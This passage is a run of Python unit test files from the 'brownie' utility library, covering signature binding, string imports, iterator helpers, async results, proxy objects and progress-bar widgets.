        # Defaults are captured as (name, default) pairs in order.
        func = lambda a=1, b=2, c=3: None
        Assert(Signature.from_function(func)) == (
            [], [('a', 1), ('b', 2), ('c', 3)], None, None
        )

    @test
    def mixed_positionals_keyword_arguments(self):
        func = lambda a, b, c=3: None
        Assert(Signature.from_function(func)) == (
            ['a', 'b'], [('c', 3)], None, None
        )
        func = lambda a, b, c=3, d=4: None
        Assert(Signature.from_function(func)) == (
            ['a', 'b'], [('c', 3), ('d', 4)], None, None
        )

    @test
    def arbitary_positionals(self):
        # The *args slot records the parameter's actual name.
        foo = lambda *foo: None
        bar = lambda *bar: None
        for func, name in [(foo, 'foo'), (bar, 'bar')]:
            Assert(Signature.from_function(func)) == ([], [], name, None)

    @test
    def arbitary_keyword_arguments(self):
        # The **kwargs slot records the parameter's actual name.
        spam = lambda **spam: None
        eggs = lambda **eggs: None
        for func, name in [(spam, 'spam'), (eggs, 'eggs')]:
            Assert(Signature.from_function(func)) == ([], [], None, name)
class TestBindArguments(TestBase):
    """Tests for :meth:`Signature.bind_arguments`, which maps call-time
    ``(args, kwargs)`` onto a dict of parameter names.

    Error messages are matched with ``re.match`` because the order in
    which offending names appear is not guaranteed — each ``'.'`` in a
    message pattern stands for one parameter name.
    """

    @test
    def arguments_no_args(self):
        sig = Signature.from_function(lambda: None)
        Assert(sig.bind_arguments()) == {}
        with Assert.raises(ValueError) as exc:
            sig.bind_arguments((1, ), {})
        Assert(exc.args[0]) == 'expected at most 0 positional arguments, got 1'
        tests = [
            ({'a': 1}, "got unexpected keyword argument '.'"),
            ({'a': 1, 'b': 2}, "got unexpected keyword arguments '.' and '.'"),
            (
                {'a': 1, 'b': 2, 'c': 3},
                "got unexpected keyword arguments '.', '.' and '.'"
            )
        ]
        for kwargs, message in tests:
            with Assert.raises(ValueError) as exc:
                sig.bind_arguments(kwargs=kwargs)
            # exc.args[0] is wrapped by attest; .obj is the raw string.
            err_msg = exc.args[0].obj
            assert re.match(message, err_msg) is not None
            # Every offending name must be mentioned, in whatever order.
            for name in kwargs:
                assert name in err_msg

    @test
    def arguments_only_positionals(self):
        sig = Signature.from_function(lambda a, b, c: None)
        Assert(sig.bind_arguments((1, 2, 3))) == dict(a=1, b=2, c=3)
        Assert(sig.bind_arguments((1, 2), {'c': 3})) == dict(a=1, b=2, c=3)
        tests = [
            ([('a', 1), ('b', 2)], "'.' is missing"),
            ([('a', 1)], "'.' and '.' are missing"),
            ([], "'.', '.' and '.' are missing")
        ]
        all_names = set('abc')
        for args, message in tests:
            names, values = [], []
            for name, value in args:
                names.append(name)
                values.append(value)
            # Missing parameters must be reported identically whether the
            # supplied arguments were positional or keyword.
            with Assert.raises(ValueError) as exc_args:
                sig.bind_arguments(values)
            with Assert.raises(ValueError) as exc_kwargs:
                sig.bind_arguments(kwargs=dict(args))
            for exc in [exc_args, exc_kwargs]:
                err_msg = exc.args[0].obj
                assert re.match(message, err_msg) is not None
                for name in all_names.difference(names):
                    assert name in err_msg
        with Assert.raises(ValueError) as exc:
            sig.bind_arguments((1, 2, 3), {'c': 4})
        Assert(exc.args[0]) == "got multiple values for 'c'"

    @test
    def arguments_only_keyword_arguments(self):
        sig = Signature.from_function(lambda a=1, b=2, c=3: None)
        Assert(sig.bind_arguments()) == dict(a=1, b=2, c=3)
        Assert(sig.bind_arguments(('a', ))) == dict(a='a', b=2, c=3)
        Assert(sig.bind_arguments((), {'a': 'a'})) == dict(a='a', b=2, c=3)

    @test
    def arguments_arbitary_positionals(self):
        sig = Signature.from_function(lambda *args: None)
        Assert(sig.bind_arguments()) == {'args': ()}
        Assert(sig.bind_arguments((1, 2, 3))) == {'args': (1, 2, 3)}

    @test
    def arguments_mixed_positionals(self):
        sig = Signature.from_function(lambda a, b, *args: None)
        Assert(sig.bind_arguments((1, 2))) == dict(a=1, b=2, args=())
        Assert(sig.bind_arguments((1, 2, 3))) == dict(a=1, b=2, args=(3, ))
        with Assert.raises(ValueError):
            Assert(sig.bind_arguments())

    @test
    def arguments_arbitary_keyword_arguments(self):
        sig = Signature.from_function(lambda **kwargs: None)
        Assert(sig.bind_arguments()) == {'kwargs': {}}
        Assert(sig.bind_arguments((), {'a': 1})) == {'kwargs': {'a': 1}}

    @test
    def arguments_mixed_keyword_arguments(self):
        sig = Signature.from_function(lambda a=1, b=2, **kwargs: None)
        Assert(sig.bind_arguments()) == dict(a=1, b=2, kwargs={})
        Assert(sig.bind_arguments((3, 4))) == dict(a=3, b=4, kwargs={})
        Assert(sig.bind_arguments((), {'c': 3})) == dict(
            a=1,
            b=2,
            kwargs=dict(c=3)
        )

    @test
    def arguments_mixed_positional_arbitary_keyword_arguments(self):
        sig = Signature.from_function(lambda a, b, **kwargs: None)
        Assert(sig.bind_arguments((1, 2))) == dict(a=1, b=2, kwargs={})
        Assert(sig.bind_arguments((1, 2), {'c': 3})) == dict(
            a=1,
            b=2,
            kwargs=dict(c=3)
        )
        Assert(sig.bind_arguments((), dict(a=1, b=2))) == dict(
            a=1,
            b=2,
            kwargs={}
        )
        with Assert.raises(ValueError):
            sig.bind_arguments()
        with Assert.raises(ValueError):
            sig.bind_arguments((1, 2), {'a': 3})

    @test
    def arguments_mixed_keyword_arguments_arbitary_positionals(self):
        sig = Signature.from_function(lambda a=1, b=2, *args: None)
        Assert(sig.bind_arguments()) == dict(a=1, b=2, args=())
        Assert(sig.bind_arguments((3, 4))) == dict(a=3, b=4, args=())
        Assert(sig.bind_arguments((3, 4, 5))) == dict(a=3, b=4, args=(5, ))
        Assert(sig.bind_arguments((), {'a': 3, 'b': 4})) == dict(
            a=3, b=4, args=()
        )
        with Assert.raises(ValueError):
            sig.bind_arguments((3, ), {'a': 4})
tests = Tests([TestFromFunction, TestBindArguments])
########NEW FILE########
__FILENAME__ = importing
# coding: utf-8
"""
brownie.tests.importing
~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.importing`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from attest import Tests, TestBase, Assert, test
from brownie.importing import import_string
class TestImportString(TestBase):
    """Tests for :func:`import_string`, which imports modules/objects by
    dotted path or ``module:attribute`` colon notation."""

    @test
    def by_name(self):
        import __main__
        module = import_string('__main__')
        Assert(module).is_(__main__)

    @test
    def by_path(self):
        import brownie.itools
        module = import_string('brownie.itools')
        Assert(module).is_(brownie.itools)

    @test
    def import_object(self):
        # A trailing dotted name may refer to an attribute, not a module.
        from brownie.itools import chain
        func = import_string('brownie.itools.chain')
        Assert(func).is_(chain)

    @test
    def colon_notation(self):
        # 'module:attr' separates the module path from the attribute.
        import brownie.itools
        module = import_string('brownie:itools')
        Assert(module).is_(brownie.itools)
        func = import_string('brownie.itools:chain')
        Assert(func).is_(brownie.itools.chain)

    @test
    def invalid_name(self):
        # The error message must name the offending identifier.
        cases = [
            ('brownie:itools.chain', 'itools.chain'),
            ('brownie-itools:chain', 'brownie-itools')
        ]
        for test, invalid_identifier in cases:
            with Assert.raises(ValueError) as exc:
                import_string(test)
            Assert(invalid_identifier).in_(exc.args[0])

    @test
    def import_non_existing_module(self):
        with Assert.raises(ImportError):
            import_string('foobar')
tests = Tests([TestImportString])
########NEW FILE########
__FILENAME__ = itools
# coding: utf-8
"""
brownie.tests.itools
~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.itools`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from attest import Tests, Assert
from brownie.itools import (
izip_longest,
product,
compress,
count,
permutations,
combinations_with_replacement,
starmap,
grouped,
unique,
chain,
flatten
)
tests = Tests()
@tests.test
def test_chain():
    # chain and chain.from_iterable mirror the itertools API.
    Assert(list(chain([1, 2], [3, 4]))) == [1, 2, 3, 4]
    Assert(list(chain.from_iterable([[1, 2], [3, 4]]))) == [1, 2, 3, 4]
@tests.test
def test_izip_longest():
    # Each case: ((args, kwargs), expected). Short iterables are padded
    # with None or the given fillvalue.
    tests = [
        (((['a', 'b'], ['c', 'd']), {}), [('a', 'c'), ('b', 'd')]),
        (((['a'], ['c', 'd']), {}), [('a', 'c'), (None, 'd')]),
        (((['a'], ['c', 'd']), {'fillvalue': 1}), [('a', 'c'), (1, 'd')])
    ]
    for test, result in tests:
        args, kwargs = test
        Assert(list(izip_longest(*args, **kwargs))) == result
@tests.test
def test_permutations():
    # Strings stand in for the expected tuples; map(tuple, ...) converts
    # them (Python 2 map returns a list).
    tests = [
        ((('abc', )), ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']),
        ((('abc', 1)), ['a', 'b', 'c']),
        ((('abc', 2)), ['ab', 'ac', 'ba', 'bc', 'ca', 'cb']),
        ((('abc', 4)), [])  # r > len(iterable) yields nothing
    ]
    for test, result in tests:
        result = map(tuple, result)
        Assert(list(permutations(*test))) == result
@tests.test
def test_product():
    # Each case: ((args, kwargs), expected-as-strings).
    tests = [
        ((('ABCD', 'xy'), {}), ['Ax', 'Ay', 'Bx', 'By', 'Cx', 'Cy', 'Dx', 'Dy']),
        ((('01', ), {'repeat': 3}), [
            '000', '001', '010', '011', '100', '101', '110', '111'
        ])
    ]
    for test, result in tests:
        args, kwargs = test
        result = map(tuple, result)
        Assert(list(product(*args, **kwargs))) == result
@tests.test
def test_starmap():
    # starmap unpacks each tuple as the callable's arguments.
    add = lambda a, b: a + b
    Assert(list(starmap(add, [(1, 2), (3, 4)]))) == [3, 7]
@tests.test
def test_combinations_with_replacement():
    # Strings stand in for the expected tuples.
    tests = [
        (('ABC', 2), ['AA', 'AB', 'AC', 'BB', 'BC', 'CC']),
        (('ABC', 1), ['A', 'B', 'C']),
        (('ABC', 3), [
            'AAA', 'AAB', 'AAC', 'ABB', 'ABC', 'ACC', 'BBB', 'BBC', 'BCC', 'CCC'
        ])
    ]
    for test, result in tests:
        result = map(tuple, result)
        Assert(list(combinations_with_replacement(*test))) == result
@tests.test
def test_compress():
    # Elements are kept where the selector is truthy; a short selector
    # truncates the output.
    tests = [
        (('ABCDEF', []), []),
        (('ABCDEF', [0, 0, 0, 0, 0, 0]), []),
        (('ABCDEF', [1, 0, 1, 0, 1, 0]), ['A', 'C', 'E']),
        (('ABCDEF', [0, 1, 0, 1, 0, 1]), ['B', 'D', 'F']),
        (('ABCDEF', [1, 1, 1, 1, 1, 1]), ['A', 'B', 'C', 'D', 'E', 'F'])
    ]
    for test, result in tests:
        Assert(list(compress(*test))) == result
@tests.test
def test_count():
    # count() is infinite, so only the first len(result) values are
    # drawn (Python 2 iterator protocol: .next()).
    tests = [
        ((), [0, 1, 2, 3, 4]),
        ((1, ), [1, 2, 3, 4, 5]),
        ((0, 2), [0, 2, 4, 6, 8])
    ]
    for test, result in tests:
        c = count(*test)
        Assert([c.next() for _ in result]) == result
@tests.test
def test_grouped():
    # grouped(n, iterable[, fillvalue]) chunks into n-tuples, padding the
    # last tuple with the fillvalue (default None).
    tests = [
        ((0, 'abc'), []),
        ((2, 'abc'), [('a', 'b'), ('c', None)]),
        ((2, 'abc', 1), [('a', 'b'), ('c', 1)])
    ]
    for test, result in tests:
        Assert(list(grouped(*test))) == result
@tests.test
def test_unique():
    # unique() preserves first-seen order and also handles unhashable
    # elements (the list case below).
    tests = [
        ('aabbcc', 'abc'),
        ('aa', 'a'),
        (([1, 2], [1, 2], [3, 4], 5, 5, 5), ([1, 2], [3, 4], 5))
    ]
    for test, result in tests:
        Assert(list(unique(test))) == list(result)
    # Elements already in `seen` are excluded from the output.
    Assert(list(unique('aaabbbbccc', seen='ab'))) == ['c']
@tests.test
def test_flatten():
    # Strings are not descended into by default; passing an empty
    # ignore-tuple as second argument makes flatten recurse into them.
    tests = [
        (([1, 2, 3], ), [1, 2, 3]),
        (([1, [2, 3]], ), [1, 2, 3]),
        (([1, [2, [3]]], ), [1, 2, 3]),
        (([1, [2, [3], 4], 5, 6], ), [1, 2, 3, 4, 5, 6]),
        ((['foo', 'bar'], ), ['foo', 'bar']),
        ((['ab', 'cd'], ()), ['a', 'b', 'c', 'd'])
    ]
    for args, result in tests:
        Assert(list(flatten(*args))) == result
########NEW FILE########
__FILENAME__ = parallel
# coding: utf-8
"""
brownie.tests.parallel
~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.parallel`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from threading import Thread
from attest import Tests, Assert, TestBase, test
from brownie.parallel import get_cpu_count, AsyncResult, TimeoutError
tests = Tests()
@tests.test
def test_get_cpu_count():
    # get_cpu_count() may legitimately be unsupported on some platforms.
    try:
        Assert(get_cpu_count()) > 0
        Assert(get_cpu_count()) == get_cpu_count()
    except NotImplementedError:
        # make sure default is returned if the number of processes cannot be
        # determined
        Assert(get_cpu_count(2)) == 2
class TestAsyncResult(TestBase):
    """Tests for :class:`AsyncResult`.

    The wait/get tests use a background thread that sets the result
    after ~1s, with a 2s timeout to keep them deterministic.
    """

    @test
    def wait(self):
        aresult = AsyncResult()
        def setter(aresult):
            time.sleep(1)
            aresult.set('foo')
        t = Thread(target=setter, args=(aresult, ))
        t.start()
        with Assert.not_raising(TimeoutError):
            aresult.wait(2)

    @test
    def get(self):
        aresult = AsyncResult()
        # get() with a timeout on an unset result must time out.
        with Assert.raises(TimeoutError):
            aresult.get(0.1)
        def setter(aresult):
            time.sleep(1)
            aresult.set('foo')
        t = Thread(target=setter, args=(aresult, ))
        t.start()
        with Assert.not_raising(TimeoutError):
            Assert(aresult.get(2)) == 'foo'
        aresult.set('foo')
        Assert(aresult.get()) == 'foo'
        # A failure result (success=False) re-raises the stored exception.
        aresult = AsyncResult()
        aresult.set(ValueError(), success=False)
        with Assert.raises(ValueError):
            aresult.get()

    @test
    def callback_errback(self):
        # callback fires on success, errback on failure; either way it
        # receives the set object exactly once.
        testruns = (['callback', True], ['errback', False])
        for kwarg, success in testruns:
            l = []
            callback = lambda obj, l=l: l.append(obj)
            aresult = AsyncResult(**{kwarg: callback})
            assert not aresult.ready
            aresult.set('foo', success=success)
            Assert(len(l)) == 1
            Assert(l[0]) == 'foo'

    @test
    def repr(self):
        aresult = AsyncResult()
        Assert(repr(aresult)) == 'AsyncResult()'
        aresult = AsyncResult(callback=1)
        Assert(repr(aresult)) == 'AsyncResult(callback=1)'
        aresult = AsyncResult(errback=1)
        Assert(repr(aresult)) == 'AsyncResult(errback=1)'
        aresult = AsyncResult(callback=1, errback=2)
        Assert(repr(aresult)) == 'AsyncResult(callback=1, errback=2)'
tests.register(TestAsyncResult)
########NEW FILE########
__FILENAME__ = proxies
# coding: utf-8
"""
brownie.tests.proxies
~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import sys
from attest import Tests, TestBase, test, test_if, Assert
from brownie.proxies import as_proxy, get_wrapped, LazyProxy
from brownie.datastructures import missing
# Some proxy behaviour (e.g. __dir__) only exists on Python >= 2.6.
GE_PYTHON_26 = sys.version_info >= (2, 6)
tests = Tests()
class TestAsProxy(TestBase):
    """Tests for :func:`as_proxy`, which turns a plain class describing
    hooks (``repr``/``getattr``/``setattr``/``method``/``force``) into a
    proxy class wrapping an arbitrary object."""

    @test
    def default_repr(self):
        # Without a repr hook the proxied object's repr is used.
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        Assert(repr(proxy_cls(1))) == '1'

    @test
    def setting_repr(self):
        class FooProxy(object):
            def repr(self, proxied):
                return 'FooProxy(%s)' % repr(proxied)
        FooProxy = as_proxy(FooProxy)
        p = FooProxy(1)
        Assert(repr(p)) == 'FooProxy(1)'

    @test
    def default_attribute_handling(self):
        # Attribute reads and writes pass through to the proxied object.
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        class Foo(object):
            a = 1
        proxy = proxy_cls(Foo())
        Assert(proxy.a) == 1
        proxy.a = 2
        Assert(proxy.a) == 2

    @test
    def attribute_handling(self):
        # getattr/setattr hooks observe every attribute access.
        getattr_access = []
        setattr_access = []
        class FooProxy(object):
            def getattr(self, proxied, name):
                getattr_access.append(name)
                return getattr(proxied, name)
            def setattr(self, proxied, name, obj):
                setattr_access.append((name, obj))
                return setattr(proxied, name, obj)
        FooProxy = as_proxy(FooProxy)
        class Foo(object):
            a = 1
        proxy = FooProxy(Foo())
        Assert(proxy.a) == 1
        proxy.a = 2
        Assert(getattr_access) == ['a']
        Assert(setattr_access) == [('a', 2)]

    @test
    def default_special_method_handling(self):
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        proxy = proxy_cls(1)
        Assert(proxy + 1) == 2

    @test
    def special_method_handling(self):
        # A ``method`` hook intercepts special methods. Returning
        # ``missing`` falls back to the default behaviour; calling
        # get_result() computes it explicitly.
        def simple_method_handler(
            self, proxied, name, get_result, *args, **kwargs
        ):
            method_calls.append((name, args, kwargs))
            return missing
        def advanced_method_handler(
            self, proxied, name, get_result, *args, **kwargs
        ):
            method_calls.append((name, args, kwargs))
            return get_result(proxied, *args, **kwargs)
        for handler in [simple_method_handler, advanced_method_handler]:
            class FooProxy(object):
                method = handler
            FooProxy = as_proxy(FooProxy)
            method_calls = []
            proxy = FooProxy(1)
            Assert(proxy + 1) == 2
            Assert(proxy - 1) == 0
            Assert(proxy * 1) == 1
            Assert(proxy / 1) == 1
            Assert(proxy < 1) == False
            Assert(method_calls) == [
                ('__add__', (1, ), {}),
                ('__sub__', (1, ), {}),
                ('__mul__', (1, ), {}),
                ('__div__', (1, ), {}),
                ('__lt__', (1, ), {})
            ]

    @test
    def proper_wrapping(self):
        # as_proxy preserves name, module and docstring of the hook class.
        class FooProxy(object):
            """A little bit of documentation."""
        proxy_cls = as_proxy(FooProxy)
        Assert(proxy_cls.__name__) == FooProxy.__name__
        Assert(proxy_cls.__module__) == FooProxy.__module__
        Assert(proxy_cls.__doc__) == FooProxy.__doc__

    @test
    def forcing(self):
        # A ``force`` hook resolves the proxied callable before binary
        # operations with other proxies.
        func = lambda: 1
        class FooProxy(object):
            def method(self, proxied, name, get_result, *args, **kwargs):
                return get_result(proxied(), *args, **kwargs)
            def force(self, proxied):
                return proxied()
        FooProxy = as_proxy(FooProxy)
        proxy = FooProxy(func)
        Assert(proxy + proxy) == 2
        a = FooProxy(lambda: 1)
        b = FooProxy(lambda: 2)
        Assert(a - b) == -1
        Assert(b - a) == 1

    @test
    def getattr_not_called_on_method(self):
        # Special-method dispatch must go through the method hook only,
        # never through the getattr hook.
        getattr_access = []
        method_access = []
        class FooProxy(object):
            def method(self, proxied, name, get_result, *args, **kwargs):
                method_access.append(name)
                return get_result(proxied, *args, **kwargs)
            def getattr(self, proxied, name):
                getattr_access.append(name)
                return getattr(proxied, name)
        FooProxy = as_proxy(FooProxy)
        class Foo(object):
            spam = 1
            def __add__(self, other):
                return None
        p = FooProxy(Foo())
        p.spam
        p + p
        Assert(method_access) == ['__add__']
        Assert(getattr_access) == ['spam']

    @test
    def nonzero_via_len(self):
        # Truthiness must fall back to __len__ like plain objects do.
        class Foo(object):
            def __len__(self):
                return 0
        class Bar(object):
            def __len__(self):
                return 1
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        assert not proxy_cls(Foo())
        assert proxy_cls(Bar())

    @test
    def getitem_based_iteration(self):
        # The legacy __getitem__ iteration protocol must keep working.
        class Foo(object):
            def __getitem__(self, key):
                if key >= 3:
                    raise IndexError(key)
                return key
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        proxy = proxy_cls(Foo())
        Assert(list(proxy)) == [0, 1, 2]

    @test
    def reversed(self):
        # reversed() must work via __getitem__+__len__ as well as via a
        # dedicated __reversed__.
        class Foo(object):
            def __getitem__(self, key):
                if key >= 3:
                    raise IndexError(key)
                return key
            def __len__(self):
                return 3
        class Bar(object):
            def __reversed__(self):
                yield 2
                yield 1
                yield 0
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        Assert(list(reversed(proxy_cls(Foo())))) == [2, 1, 0]
        Assert(list(reversed(proxy_cls(Bar())))) == [2, 1, 0]

    @test
    def contains(self):
        # ``in`` must work via __getitem__, __iter__ or __contains__.
        class Foo(object):
            def __getitem__(self, key):
                if key >= 3:
                    raise IndexError(key)
                return key
        class Bar(object):
            def __iter__(self):
                yield 0
                yield 1
                yield 2
        class Baz(object):
            def __contains__(self, other):
                return other in (0, 1, 2)
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        for cls in (Foo, Bar, Baz):
            for i in xrange(3):
                assert i in proxy_cls(cls())

    @test
    def getslice(self):
        # Slicing must work via __getitem__ and the legacy __getslice__.
        class Foo(object):
            def __getitem__(self, key):
                return [0, 1, 2][key]
            def __len__(self):
                return 3
        class Bar(object):
            def __getslice__(self, i, j):
                return [0, 1, 2][i:j]
            def __len__(self):
                return 3
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        a = proxy_cls(Foo())
        b = proxy_cls(Bar())
        Assert(a[:]) == b[:] == [0, 1, 2]
        Assert(a[1:]) == b[1:] == [1, 2]
        Assert(a[1:-1]) == b[1:-1] == [2]
        Assert(a[:-1]) == b[:-1] == [0, 1]

    @test
    def setslice(self):
        # Slice assignment must work via __setitem__ and the legacy
        # __setslice__.
        class Foo(object):
            def __init__(self):
                self.sequence = [0, 1, 2]
            def __eq__(self, other):
                if isinstance(other, list):
                    return self.sequence == other
                return self.sequence == other.sequence
            def __ne__(self, other):
                return self.sequence != other.sequence
            __hash__ = None
            def __len__(self):
                return len(self.sequence)
            def __repr__(self):
                return repr(self.sequence)
        class Bar(Foo):
            def __setitem__(self, key, value):
                self.sequence[key] = value
        class Baz(Foo):
            def __setslice__(self, i, j, value):
                self.sequence[i:j] = value
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        make_proxies = lambda: (proxy_cls(Bar()), proxy_cls(Baz()))
        a, b = make_proxies()
        a[:] = b[:] = 'abc'
        Assert(a) == b == ['a', 'b', 'c']
        a, b = make_proxies()
        a[1:] = b[1:] = 'bc'
        Assert(a) == b == [0, 'b', 'c']
        a, b = make_proxies()
        a[1:-1] = b[1:-1] = ['b']
        Assert(a) == b == [0, 'b', 2]
        a, b = make_proxies()
        a[:-1] = b[:-1] = ['a', 'b']
        Assert(a) == b == ['a', 'b', 2]

    @test
    def delslice(self):
        # Slice deletion must work via __delitem__ and the legacy
        # __delslice__.
        class Foo(object):
            def __init__(self):
                self.sequence = [0, 1, 2]
            def __eq__(self, other):
                if isinstance(other, list):
                    return self.sequence == other
                return self.sequence == other.sequence
            def __ne__(self, other):
                return self.sequence != other.sequence
            __hash__ = None
            def __len__(self):
                return len(self.sequence)
            def __repr__(self):
                return repr(self.sequence)
        class Bar(Foo):
            def __delitem__(self, key):
                del self.sequence[key]
        class Baz(Foo):
            def __delslice__(self, i, j):
                del self.sequence[i:j]
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        make_proxies = lambda: (proxy_cls(Bar()), proxy_cls(Baz()))
        a, b = make_proxies()
        del a[:]
        del b[:]
        Assert(a) == b == []
        a, b = make_proxies()
        del a[1:]
        del b[1:]
        Assert(a) == b == [0]
        a, b = make_proxies()
        del a[1:-1]
        del b[1:-1]
        Assert(a) == b == [0, 2]
        a, b = make_proxies()
        del a[:-1]
        del b[:-1]
        Assert(a) == b == [2]

    @test_if(GE_PYTHON_26)
    def dir(self):
        # __dir__ delegation is only available on Python >= 2.6.
        class Foo(object):
            bar = None
            def spam(self):
                pass
            def eggs(self):
                pass
        proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
        Assert(dir(Foo)) == dir(proxy_cls(Foo))
tests.register(TestAsProxy)
@tests.test
def test_get_wrapped():
    # get_wrapped() returns the very object the proxy wraps.
    proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
    wrapped = 1
    Assert(get_wrapped(proxy_cls(wrapped))).is_(wrapped)
class TestLazyProxy(TestBase):
    """Tests for :class:`LazyProxy`, which wraps a factory callable and
    forwards operations to the object the factory returns."""

    @test
    def special(self):
        p = LazyProxy(lambda: 1)
        Assert(p + p) == 2
        Assert(p + 1) == 2
        Assert(1 + p) == 2

    @test
    def getattr(self):
        p = LazyProxy(int)
        # BUG FIX: this previously read ``Assert(p).imag = 0.0``, which
        # *assigned* an attribute on the Assert wrapper and asserted
        # nothing. The intent is to check that attribute access is
        # forwarded to the proxied object (int() == 0, whose .imag is 0).
        Assert(p.imag) == 0.0

    @test
    def setattr(self):
        class Foo(object):
            pass
        foo = Foo()
        p = LazyProxy(lambda: foo)
        # Attribute writes must reach the underlying object.
        p.a = 1
        Assert(p.a) == 1
        Assert(foo.a) == 1

    @test
    def repr(self):
        p = LazyProxy(int)
        Assert(repr(p)) == 'LazyProxy(%r)' % int

    @test
    def contains(self):
        p = LazyProxy(lambda: "abc")
        assert "b" in p

    @test
    def getslice(self):
        p = LazyProxy(lambda: "abc")
        assert p[1:2] == "b"
tests.register(TestLazyProxy)
########NEW FILE########
__FILENAME__ = progress
# coding: utf-8
"""
brownie.tests.terminal.progress
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.terminal.progress`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from StringIO import StringIO
from brownie.terminal import TerminalWriter
from brownie.terminal.progress import (
ProgressBar, Widget, TextWidget, HintWidget, PercentageWidget, BarWidget,
PercentageBarWidget, parse_progressbar, StepWidget, bytes_to_string,
count_digits, TimeWidget, DataTransferSpeedWidget
)
from attest import Tests, TestBase, test, Assert
tests = Tests([])
@tests.test
def test_count_digits():
    # A negative sign counts towards the digit width.
    Assert(count_digits(10)) == 2
    Assert(count_digits(0)) == 1
    Assert(count_digits(-10)) == 3
@tests.test
def test_bytes_to_string():
    # Binary (default) keeps 1000 below one KiB; SI units scale at 1000.
    Assert(bytes_to_string(1000)) == '1000B'
    si = bytes_to_string(1000, binary=False)
    Assert('kB').in_(si)
    Assert('1').in_(si)
@tests.test
def test_parse_progressbar():
    # The mini-language: ``$name[:arg]`` widget references, ``$$`` as an
    # escaped dollar, quoted arguments with backslash escapes; everything
    # else becomes a 'text' token.
    tests = [
        ('foobar', [['text', 'foobar']]),
        ('$foo bar', [['foo', None], ['text', ' bar']]),
        ('$foo $$bar', [['foo', None], ['text', ' $bar']]),
        ('$foo:spam bar', [['foo', 'spam'], ['text', ' bar']]),
        ('$foo:""', [['foo', '']]),
        ('$foo:"spam eggs" bar', [['foo', 'spam eggs'], ['text', ' bar']]),
        ('$foo:"spam\\" eggs" bar', [['foo', 'spam\" eggs'], ['text', ' bar']])
    ]
    for test, result in tests:
        Assert(parse_progressbar(test)) == result
class TestWidget(TestBase):
    """Tests for the abstract :class:`Widget` base class."""

    @test
    def size_hint(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = Widget()
        # The base class offers no size hint.
        assert not widget.provides_size_hint
        Assert(widget.size_hint(progressbar)).is_(None)

    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = Widget()
        # init() is abstract and must name itself in the error.
        with Assert.raises(NotImplementedError) as exc:
            widget.init(progressbar, writer.get_width())
        Assert(exc.args[0]) == 'Widget.init'

    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = Widget()
        # update() is abstract and must name itself in the error.
        with Assert.raises(NotImplementedError) as exc:
            widget.update(progressbar, writer.get_width())
        Assert(exc.args[0]) == 'Widget.update'

    @test
    def finish(self):
        # The default finish() delegates to update().
        class MyWidget(Widget):
            update_called = False
            def update(self, writer, remaining_width, **kwargs):
                self.update_called = True
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = MyWidget()
        widget.finish(progressbar, writer.get_width())
        assert widget.update_called

    @test
    def repr(self):
        widget = Widget()
        Assert(repr(widget)) == 'Widget()'
tests.register(TestWidget)
@tests.test
def test_text_widget():
    # TextWidget renders the same static text in every phase, and its
    # size hint equals the text length.
    writer = TerminalWriter(StringIO())
    progressbar = ProgressBar([], writer)
    widget = TextWidget('foobar')
    assert widget.provides_size_hint
    Assert(widget.size_hint(progressbar)) == len('foobar')
    Assert(widget.init(progressbar, writer.get_width())) == 'foobar'
    Assert(widget.update(progressbar, writer.get_width())) == 'foobar'
    Assert(widget.finish(progressbar, writer.get_width())) == 'foobar'
    Assert(repr(widget)) == "TextWidget('foobar')"
@tests.test
def test_hint_widget():
    # HintWidget shows its initial hint and thereafter whatever hint is
    # passed per update/finish call.
    writer = TerminalWriter(StringIO())
    progressbar = ProgressBar([], writer)
    widget = HintWidget('foo')
    assert not widget.provides_size_hint
    Assert(widget.init(progressbar, writer.get_width())) == 'foo'
    Assert(widget.update(progressbar, writer.get_width(), hint='bar')) == 'bar'
    Assert(widget.update(progressbar, writer.get_width(), hint='baz')) == 'baz'
    Assert(widget.finish(progressbar, writer.get_width(), hint='spam')) == 'spam'
    Assert(repr(widget)) == "HintWidget('foo')"
    # BUG FIX: this comparison previously lacked the Assert() wrapper, so
    # its result was discarded and the no-hint case was never checked.
    Assert(widget.finish(progressbar, writer.get_width())) == u''
class TestPercentageWidget(TestBase):
    """Tests for :class:`PercentageWidget`."""

    @test
    def size_hint(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=20)
        widget = PercentageWidget()
        assert widget.provides_size_hint
        # Hint grows with the rendered percentage: '0%' -> '100%'.
        Assert(widget.size_hint(progressbar)) == 2
        progressbar.step = 1
        Assert(widget.size_hint(progressbar)) == 2
        progressbar.step = 2
        Assert(widget.size_hint(progressbar)) == 3
        progressbar.step = 20
        Assert(widget.size_hint(progressbar)) == 4

